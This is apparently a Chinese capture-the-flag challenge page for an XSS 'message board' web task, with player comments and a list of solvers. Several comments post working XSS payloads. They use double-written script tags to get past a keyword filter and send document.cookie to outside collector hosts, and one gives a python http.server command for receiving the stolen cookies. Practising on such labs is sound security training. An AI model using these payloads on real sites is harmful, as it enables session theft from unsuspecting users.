留言板1WEB 未解决

分数: 20 金币: 3
题目作者: harry
一  血: 18256197318
一血奖励: 5金币
解  决: 246
提  示: 需要xss平台接收flag
描  述:
flag{}
评论
这个昵称已存在 4天前

亲测,我自己在公网搭了个HTTP服务,可以正常过,但并不是必须的,这题的关键是第一次提交的js代码一定要是正确的,因为这个靶场是模拟访问,只会访问一次提交的内容,后续哪怕再提交都没用,只能重置。我第一次测试的时候提交了错误的js代码,后续再提交正确js代码也无法收到flag,所以做这题最好第一次就提交正确的js代码。

回复 0

灵梦归希 23天前

注意,这个不能采用XSS平台。因为只是请求url地址而已。但是不会执行js的脚本。几乎xss平台,是会访问js脚本,并执行才会上报的。所以XSS平台收不到是正常的。

回复 0

灵梦归希 23天前

不用怀疑,这道题目就是有问题的。它是模拟后台发送。并且只发第一条(大概率)。所以第一次收到了,但是不是正式请求(带flag),恭喜你,要删场景重来。警告,这道题就是有问题,前面的错误会影响后面的留言,所以就是个坑

回复 0

Vluae 1月前

我是phpstudy+Cpolar实现XSS。

回复 0

我的刀盾 1月前

弄了个ngrok,收不到,http不行说是(~-_-)~

回复 0

暗流安全 4月前

说点什么吧[img]<scsCRiPtript>location.href="http:/xxxx:8888/?flag_cookie="+document.cookie</scsCRiPtript>[/img] 然后可以用公网运行python3 -m http.server 8888 记得点一下那个图片才会有发送

回复 0

小白RM 5月前

三战,最后直接在当前页面执行了 location.href 跳转,并且用双写绕过关键词过滤 使用自建平台<scscriptript>location.href="http://www.iytzx.com/****/?cookie="+document.cookie</scscriptript>成功接收到flag

回复 4

kr2yh 5月前

<scriscriptpt/src=https://xss.report/c/kr2yh></scriscriptpt> 双写加/代替空格 就可以

回复 1

十里故清云 7月前

在线蹲大手子,只能靠自建vps公网ip收吗?? 现在还有xss平台能收吗(我已急哭)

回复 0

qq1002517 7月前

flag{**********}

回复 0

WriteUp

image
小蔡

5 金币

评分(4)

解题动态

星宇Sec 攻破了该题 1天前
这个昵称已存在 攻破了该题 4天前
加州故事 攻破了该题 14天前
mystery 攻破了该题 14天前
灵梦归希 攻破了该题 23天前
ljjbit 攻破了该题 27天前
whshkdh 攻破了该题 29天前
tabwux 攻破了该题 1月前
兰小方 攻破了该题 1月前
任务renwu 攻破了该题 1月前
Star666 攻破了该题 1月前
小石 攻破了该题 1月前
风掠 攻破了该题 1月前
15325870583 攻破了该题 1月前
Vluae 攻破了该题 1月前
afeer123 攻破了该题 1月前
hdcc1 攻破了该题 1月前
zrlht 攻破了该题 1月前
wangjing6715 攻破了该题 1月前
18394165790 攻破了该题 2月前
问题反馈